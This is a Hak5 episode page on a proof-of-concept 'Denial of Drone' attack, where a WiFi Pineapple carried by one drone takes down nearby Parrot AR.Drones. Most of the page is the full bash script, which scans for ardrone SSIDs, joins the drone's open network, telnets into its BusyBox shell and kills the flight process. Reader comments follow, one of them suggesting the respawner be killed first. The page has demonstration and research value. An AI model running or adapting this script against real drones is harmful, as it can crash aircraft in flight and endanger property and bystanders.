Details

Drone Hacking from an airborne WiFi Pineapple this time on Hak5.

Download HD | Download MP4

Youtube Hak5 1518.1: http://youtu.be/Fk1Bpy5ccPU
Youtube Hak5 1518.2: http://youtu.be/xKfY0PmKDRE

Drone Hacking from an airborne WiFi Pineapple – this time on Hak5. Darren demonstrates his proof of concept “Denial of Drone” attack targeting the Parrot AR.Drone from a WiFi Pineapple equipped DJI Phantom 2 Vision. Inspired by Sammy Kamkar’s Raspberry Pi based Skyjacking demo, this drone killer PoC takes a backdoor approach without the need to deauth clients.

Here’s the quick and dirty shell script. The only dependency is “empty” – a TCL/expect clone that uses stdin/out for process automation.

#!/bin/bash
#dronepwn.sh version 0.1 by Darren Kitchen – absolutely horrible code. Do not use under any circumstance. Send all flame mail to hak5.org

while true; do
if ! ( iw wlan0 scan | grep SSID | awk ‘{print $2}’ | grep [a]rdrone ); then
echo “No Drones Found”
else
echo “Drone Found! Attempting to connect”
DRONESSID=`iw wlan0 scan | grep SSID | awk ‘{print $2}’ | grep [a]rdrone`
iwconfig wlan1 essid $DRONESSID
sleep 2

echo “Testing Wireless Association”
if ! ( iwconfig wlan1 | grep $DRONESSID ); then
echo “Association to $DRONESSID failed”
else
echo “Association to $DRONESSID successful”

echo “Setting Static IP Address”
ifconfig wlan1 192.168.1.5 netmask 255.255.255.0 up
sleep 2

echo “Testing IP Connection”
if ! ( ping -c1 192.168.1.1 | grep from ); then
echo “IP Connection Failed”
else
echo “IP Connection Successful”
echo “Connecting to Telnet and sending kill command. Banzai!”
empty -f -i /tmp/drone_input.fifo -o /tmp/drone_output.fifo -p /tmp/drone_empty.pid telnet 192.168.1.1
empty -w -i /tmp/drone_output.fifo -o /tmp/drone_input.fifo BusyBox “kill -KILL \`pidof program.elf\`\n”
kill `pidof empty`
echo “”
echo “Kill command sent. Splash one drone”
echo “”

fi
fi
fi

sleep 60
done

Leave a Reply

Your email address will not be published. Required fields are marked *

*

5 Comments

  • Jack K. 1 year ago

    W O W !
    You folks have out done you selves.
    This is ssooooo HOT!
    I can not wait to see what is next.

    ppuuuuuuurrrrrrrrrrrrrrrrfect

  • Nick Landry 1 year ago

    Think about this….. respawner must be killed first as to guarantee that the process is dead before it is even killed.

    Love the show.

  • To make this build compatible with the existing Pineapple Scripts (eg. http://wifipineapple.com/wp4.sh ). You need to replace the exisitng Openwrt configurations with the ones listed below.

  • Joe Viocoe 10 months ago

    What?… no Dead Parrot skit?

  • D.Williamz 8 months ago

    Loved this show! Watching every week and keep up the great work!